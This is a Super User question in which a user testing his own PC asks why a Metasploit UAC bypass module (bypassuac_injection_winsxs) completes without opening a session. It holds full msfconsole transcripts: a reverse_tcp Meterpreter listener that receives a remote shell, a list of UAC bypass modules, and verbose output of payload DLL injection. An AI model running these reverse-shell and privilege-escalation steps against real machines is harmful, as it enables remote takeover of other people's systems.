# Exploit completed but no session was created

Tags: kali-linux, uac, metasploit

I was trying a pen-test on my PC by WSL and Kali and everything was fine until the payload was created and executed on my target PC, also getting a session back.

- After the first step, I get:

  ```
  msf6 > use multi/handler
    [*] Using configured payload generic/shell_reverse_tcp

  msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

  msf6 exploit(multi/handler) > set lhost 10.9.88.222
    lhost => 10.9.88.222

  msf6 exploit(multi/handler) > set lport 8080
    lport => 8080

  msf6 exploit(multi/handler) > start
    [-] Unknown command: start.

  msf6 exploit(multi/handler) > exploit
    [*] Started reverse TCP handler on 10.9.88.222:8080
    [*] Sending stage (175174 bytes) to 10.9.0.1
    [*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530

  meterpreter >
  ```
- However, the main problem occurs here; I tried to bypass the UAC and gain system-level privileges, trying 4 - 6 modules, got via a search result after executing  `search uac`, and upon executing `search uac`, I get:

  ```
  meterpreter > background
    [*] Backgrounding session 1...

  msf6 exploit(multi/handler) > search uac

  Matching Modules
  ================

    #   Name                                                   Disclosure Date  Rank       Check  Description
    -   ----                                                   ---------------  ----       -----  -----------
    0   exploit/windows/local/ask                              2012-01-03       excellent  No     Windows Escalate UAC Execute RunAs
    1   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
    2   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
    3   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
    4   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
    5   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
    6   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
    7   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
    8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
    9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
    10  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
    11  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
    12  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
    13  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
    14  post/windows/gather/win_privs                                           normal     No     Windows Gather Privileges Enumeration
    15  post/windows/manage/sticky_keys                                         normal     No     Sticky Keys Persistance Module


  Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys
  ```

  I tried Module 7, receiving:

  ```
  msf6 exploit(multi/handler) > use 7
    [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets
    Exploit targets:

      Id  Name
      --  ----
      0   Windows x86
      1   Windows x64

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1
    target => 1

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1
    session => 1

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222
    LHOST => 10.9.88.222

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080
    LPORT => 8080

  msf6 exploit(windows/local/bypassuac_injection_winsxs) > run
    [*] Started reverse TCP handler on 10.9.88.222:8080
    [+] Windows 10 (10.0 Build 18363). may be vulnerable.
    [*] UAC is Enabled, checking level...
    [+] Part of Administrators group! Continuing...
    [+] UAC is set to Default
    [+] BypassUAC can bypass this setting, continuing...
    [*] Creating temporary folders...
    [*] Uploading the Payload DLL to the filesystem...
    [*] Spawning process with Windows Publisher Certificate, to inject into...
    [+] Successfully injected payload in to process: 9248
    [*] Exploit completed, but no session was created.

  msf6 exploit(windows/local/bypassuac_injection_winsxs) >
  ```

  - Everything goes fine, but the session is not created, receiving:

    ```
    exploit completed but no session was created
    ```
  - I get this on running with verbose mode on

    ```
    [*] Started reverse TCP handler on 10.9.88.222:8080
    [+] Windows 10 (10.0 Build 18363). may be vulnerable.
    [*] UAC is Enabled, checking level...
    [*] Checking admin status...
    [+] Part of Administrators group! Continuing...
    [+] UAC is set to Default
    [+] BypassUAC can bypass this setting, continuing...
    [*] Creating temporary folders...
    [*] Uploading the Payload DLL to the filesystem...
    [*] Payload DLL 8704 bytes long being uploaded...
    [*] Spawning process with Windows Publisher Certificate, to inject into...
    [*] Injecting  into process ID 10880
    [*] Opening process 10880
    [*] Injecting struct into 10880
    [*] Executing payload
    [+] Successfully injected payload in to process: 10880
    [*] Exploit completed, but no session was created.
    ```
  - I used `Portmap.io` to port forward (free plan), and have the latest versions of the Metasploit framework, WSL 2, and the Kali Linux app installed

How do I troubleshoot this?

Comment: [Why did you resubmit this question and delete your original question from earlier?](https://superuser.com/questions/1615569/exploit-completed-but-no-session-was-created)

Comment: @Ramhound I have added the details... Please help me. This problem is killing me :(.

Comment: @Ramhound Please tell what is verbose mode and how to enable it?

Comment: @Ramhound I have added verbose mode information. Please see point 4.